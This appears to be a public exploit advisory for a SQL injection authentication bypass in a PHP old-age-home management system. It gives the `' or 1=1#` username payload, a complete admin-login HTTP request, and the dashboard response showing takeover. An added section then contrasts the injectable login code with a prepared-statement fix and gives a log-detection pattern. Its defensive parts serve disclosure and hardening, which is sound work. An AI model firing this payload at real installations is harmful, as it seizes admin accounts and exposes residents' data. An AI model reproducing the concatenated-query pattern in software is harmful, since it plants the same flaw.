## Title: Old Age Home Management-2022-2023-1.0 SQLi-Bypass-Authentication-Account-Take-Over
## Author: nu11secur1ty
## Date: 04.29.2023
## Vendor: BY ANUJ KUMAR, https://phpgurukul.com/author/anujk305/
## Software: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/#google_vignette
## Reference: https://portswigger.net/web-security/sql-injection/lab-login-bypass

## Description:
The username parameter appears to be vulnerable to SQL injection attacks. The payloads `nu11secur1ty' or 1=1#` and `nu11secur1ty%27+or+1%3D1%23` were each submitted in the username parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. An attacker can easily take control of the admin account, after which everything is lost for this app and the users who are using it.

STATUS: CRITICAL

[+]Exploit:

```http
POST /oahms/admin/login.php HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=n8igimmg4o7ddmpnbfueujouvg
Content-Length: 62
Cache-Control: max-age=0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://pwnedhost.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://pwnedhost.com/oahms/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username=nu11secur1ty%27+or+1%3D1%23&password=password&submit=
```

[+]Response:

```http
HTTP/1.1 200 OK
Date: Sat, 29 Apr 2023 05:32:07 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
Content-Security-Policy: upgrade-insecure-requests;
X-Powered-By: PHP/8.2.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13518

Old Age Home Management System|| Dashboard
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0)

## Proof and Exploit
[href](https://streamable.com/qtj0bz)

## Time spent: 00:30:00
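The advisory does not include the application's login code, so the following is an added illustration (not the project's source, not the author's code) of the pattern that produces the behaviour above, beside the fix a maintainer would apply. Table and column names (`admin_users`, `username`, `password_hash`), the `mysqli` connection and the use of `mysqlnd` (needed for `get_result()`) are assumptions. In the concatenated query, the `#` in the submitted username starts a MySQL comment, so the `AND password=...` clause is discarded and `or 1=1` matches every admin row; with a prepared statement the same string is bound as a plain value and matches nothing.

```php
<?php
// Added illustration (not the project's code): injectable login beside a hardened one.
// Assumed schema: admin_users(id, username, password, password_hash).

// VULNERABLE PATTERN: the username is concatenated straight into SQL.
// With username  nu11secur1ty' or 1=1#  the executed statement becomes
//   SELECT id FROM admin_users WHERE username='nu11secur1ty' or 1=1#' AND password='...'
// Everything after '#' is a MySQL comment, so the password never gets checked and
// the first admin row is returned: authentication bypass, as the advisory shows.
function login_vulnerable(mysqli $db, string $username, string $password): ?int
{
    $sql = "SELECT id FROM admin_users WHERE username='" . $username
         . "' AND password='" . md5($password) . "'";
    $result = $db->query($sql);
    $row = $result ? $result->fetch_assoc() : null;
    return $row ? (int) $row['id'] : null;
}

// HARDENED: bound parameters keep the username a value, never SQL text;
// the password is checked against a slow hash (password_hash/password_verify)
// instead of md5, and the session id is rotated on successful login.
function login_hardened(mysqli $db, string $username, string $password): ?int
{
    $stmt = $db->prepare(
        "SELECT id, password_hash FROM admin_users WHERE username = ? LIMIT 1"
    );
    $stmt->bind_param('s', $username);   // 's' = bind as string, no interpolation
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // null when no row matched
    $stmt->close();

    // Verify even when no row exists to keep timing uniform between
    // "unknown user" and "wrong password" (dummy hash is a placeholder).
    $hash = $row['password_hash'] ?? '$2y$10$invalidinvalidinvalidinvalidinvalidinvalidinvalidinv';
    if ($row === null || !password_verify($password, $hash)) {
        return null;
    }
    session_regenerate_id(true);   // prevent session fixation after login
    return (int) $row['id'];
}

// Assumed usage (connection parameters are placeholders):
// $db = new mysqli('localhost', 'app_user', 'app_password', 'oahms');
// login_vulnerable($db, "nu11secur1ty' or 1=1#", 'password');  // returns an admin id
// login_hardened($db,   "nu11secur1ty' or 1=1#", 'password');  // returns null
```

For detection while the fix is being deployed, the same payload is visible in access logs as `username=...%27+or+1%3D1%23` on `POST /oahms/admin/login.php`; a successful exploitation shows that request followed by the dashboard response rather than the login page, which is a usable alert condition on the web server logs.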